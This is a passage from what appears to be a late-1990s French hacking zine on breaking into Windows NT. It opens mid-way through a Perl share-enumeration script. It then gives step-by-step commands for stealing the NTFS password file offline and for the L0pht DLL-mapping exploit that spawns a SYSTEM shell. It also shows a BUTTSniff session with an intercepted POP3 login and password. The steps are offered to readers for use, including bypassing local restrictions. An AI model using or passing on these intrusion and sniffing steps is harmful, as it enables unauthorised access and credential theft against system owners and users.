close (AUTH);
system ("del temp.txt");
print ("\nCompleted");
system ("notepad $target.txt");
}
else
{
print ("No IPC\$ share available");
}
Hack de NT en local:
-=-=-=-=-=-=-=-=-=-=-
Une technique tres simple consiste a booter avec une disquette dos, monter la
partition NTFS avec 'ntfsdos.exe' et aller chercher le fichier de mot de passe.
Une autre, basé sur le même principe, peut se faire depuis Linux.
Comme c'est le cas dans mon univ, nous avons Linux/Nt en multiboot. On peut donc monter
la partition NTFS et aller chercher le fichier.
DLL Mapping exploit (L0pht):
Bon cet exploit reste assez cool, mais la encore vous avez besoin d'être physiquement
sur la machine. Son objectif: vous ouvrir une fenêtre dos "console", administrateur.
De plus il reste trés simple à mettre en place, vous avez besoin de quelque Dll
disponible sur www.l0pht.com . Une fois les files downloadées suivez les étapes :
1. Logger vous normalement.
2. Démarrer 2 fenêtre dos.
3. Dans une, Copiez c:\winnt\system32\kernel32.dll dans c:\temp\realkern.dll
Si vous n'avez pas les droits en écriture sur temp, éditer eggddll.def, modifier
les répertoire et recompilez.
4. Copiez hackdll.exe et eggdll.dll dans c:\temp
5-a. Effacez les c:\lockout s'il existe. (Quelqun serait il passé avant vous ?) =)
5-b. Executez (Désactive kernel32.dll):
c:\> cd \temp
c:\temp> hackdll -d kernel32.dll
6. Exécutez (Active le trojan)
c:\temp> hackdll -a kernel32.dll c:\temp\eggdll.dll
Attention: N'appuyez pas sur la touche et changer de fenetre dos.
7. Il faut lancer un subsystem POSIX, par exemple:
c:\temp> posix /c calc
8. Maintenant apparait quelques boites de dialogues, repondez comme indiquez ...
NON - "User is DOMAIN\$LOGNAME, Spawn Shell?"
NON - "User is \$HOME, Spawn Shell?"
YES - "User is NT AUTHORITY\SYSTEM, Spawn Shell?"
YES - "Winsta0"
YES - "Desktop"
Maintenant, une 3éme fenêtre dos apprait, écrit console. C'est la bonne ... =)
Quelques outils pour s'amuser en local:
NT Server c:\winnt\system32> usrmgr
NT Workstation c:\winnt\system32> musrmgr
On peut aussi aller s'amuser avec regedit, regedt32 ou net ... =)
D'autre part ce système peut vous aider à installer quelques applications si vous
aviez des droits un peu trop limité.
Sniffer de réseaux:
-=-=-=-=-=-=-=-=-=-
Les Hackers "sniffent" souvent un réseau avant de lancer une attaque contre celui-ci.
Lorsqu'un hacker "sniffe" un réseau, il intercepte et copie les paquets transittant par
le réseau, il analyse ensuite le contenu des paquets pour savoir s'ils contiennent des
informations qu'il pourrait utiliser pour en gagner l'accés.
Un des plus grand risque pour votre réseau venant d'une attaque au sniffeur peut provenir
de la version de votre LANMAN. En effet des vielles versions du LAN Manage renvoient les
passwords en clair a travers votre réseau ce qui signifie qu'un hacker peut intercepter un
password sans attaquer directement le systéme et sans avoir eu a se loguer comme user
normal. Windows NT 3.51 et plus utilisent une version de LANMAN qui envoie les passwords
encryptés.
Une personne peut aussi sniffer des protocoles traditionnels tels qe FTP ou telnet qui
envoient les passwords en clair. Il est souvent le cas que le password du FTP d'un user
soit le même que celui de son accompte,obligez vos utilisateurs a avoir des mots de passe
différents.
Utilisation de BUTTSniff.exe:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
C'est un produit de Cult of The Dead Cow. C'est un sniffer trés basique, mais
qui permet baucoup de chose. Pour vous montrer la puissance voila un petit exemple.
Un utilisateur check son mail avec eudora. Pour des raisons d'anonymat, certainnes
partis du log ont été enlevées =)
D:\>BUTTSniff -d 0000 test3.log p
----- Extrait de test3.log -----
TCP Length: 50 Source Port: 110 Target Port: 1028 Seq: 9A91FEAC Ack: 0017CE40
+OK Serveur POP3
Club-Internet front3.grolier.fr
TCP Length: 15 Source Port: 1028 Target Port: 110 Seq: 0019CD40 Ack: 9A91FF2D
Flags: PA Window: 8426 TCP ChkSum: 25129 UrgPtr: 0
USER jmdupont
TCP Length: 0 Source Port: 110 Target Port: 1028 Seq: 9A91FE2D Ack: 0019DD4F
Flags: A Window: 9112 TCP ChkSum: 41830 UrgPtr: 0
TCP Length: 37 Source Port: 110 Target Port: 1028 Seq: 0A91EF2D Ack: 0119CD48
Flags: PA Window: 9152 TCP ChkSum: 54538 UrgPtr: 0
+OK Password required for jmdupont...
TCP Length: 15 Source Port: 1028 Target Port: 110 Seq: 0019CE4F Ack: 9B92FF53
Flags: PA Window: 0489 TCP ChkSum: 6558 UrgPtr: 0
PASS luidgi1mario...
TCP Length: 0 Source Port: 110 Target Port: 1028 Seq: 9A01FD62 Ack: 00192D5E
Flags: A Window: 9712 TCP ChkSum: 40978 UrgPtr: 0
-----EOF-----
Résultat> L/P: jmdupont / luidgi1mario
Vous pouvez aussi capturer des authentification smbs, phase de login, authentification
sur des pages web, authentification sur des proxy etc ... car elle passe en clair sur
le réseau.
Si vous ne trouvez aucune interface lors du listing avec BUTTSniff, utilisez donc
l'exploit Mapping Dll et installer le sniffer via la fenêtre console ... la situation
se débloque ;)
+--------------------------------+
| 4th PART: Conclusion |
| Level: include |
+--------------------------------+
Conclusion:
-=-=-=-=-=-
D'abord j'espére que vous avez reussit a trouver le moindre caractère ascii d'informations
utiles ... et que les fautes d'orthgraphes ne vous ont pas creuvé les yeux ... =) Si ce n'est
pas le cas, vous êtes dans le même cas que moi ... Vous avez du soucil à vous faire *lol*
Si aprés tout ça vous décidez de changer votre serveur NT pour une station Unix voire
Linux .. Je vous comprend =) Mais bon, on dit toujours qu'une station secure est une station
enfermée dans un coffre fort et deconnecté de tout réseau ... A vous de voir ! :)
Sources:
-=-=-=-=-
The MHD (Rhino9), Phillipe Leca (CNRS), Lars Klander, Micro$oft,Technotronic,
Windows NT (Grand livre), Rhino 9 NT WarDoc, SID Readme, L0pht heavy industries,
All exploit/security arhives sites and our neuronnes :)
URL's:
-=-=-=-
www.rhino9.com
www.l0pht.com
www.phrack.com
www.technotronic.com
www.ntresearch.com
www.ntshop.net/security/
bugtraq@netscape.org 'ML
Remerciements:
-=-=-=-=-=-=-=-
Tout d'abord un grand merci à Cyberjunk sans qui ce projet n'aurais jamais
pu voir le jour ...
Merci :
au MHT CreW (QuickTrip, B-zero-dhidarma, Shivan, TheJoker, ZorglubZ ),
à Tac0s ( pHeAr le Ban 20 ! )à Rhino9,à G0LD^FKS,et à Natashaa ....
Elle est bonne hein ShiShi !!!
Shen-lun / shen_lun@hotmail.com
Un grand Merci a tous mes pots qui me supportent durant les longues matinées ou
je rale kar j'ai pas dormi, et Thanks au teknival, nomad, spiral , tektonic, facom
et autres tribes me permettant de me défoncer la tête tranquillement pour oublier
un peu mon écran ... :-)
Greets to : dcba,#cryptel,va2,aaah,drahiin,neodyme,bob and da ultime drugz tester und
bidouilleur "JiBus" ... Remerciements aux coders d'xploit acharné ... YOU rulez !
and YOU own the pla-NET ;) Go On =)
-cjunk / snipper@hotmail.com
PS: D'autre archives sur Unix,Nt,Phreak,Net at Nevroze...
(members.xoom.com/nevroze)
* LA JEUNESSE EMMERDE LE FRONT NATIONAL *
-Et bien d'autres politiciens aussi d'aileurs ;)
-======={ FIN }=======-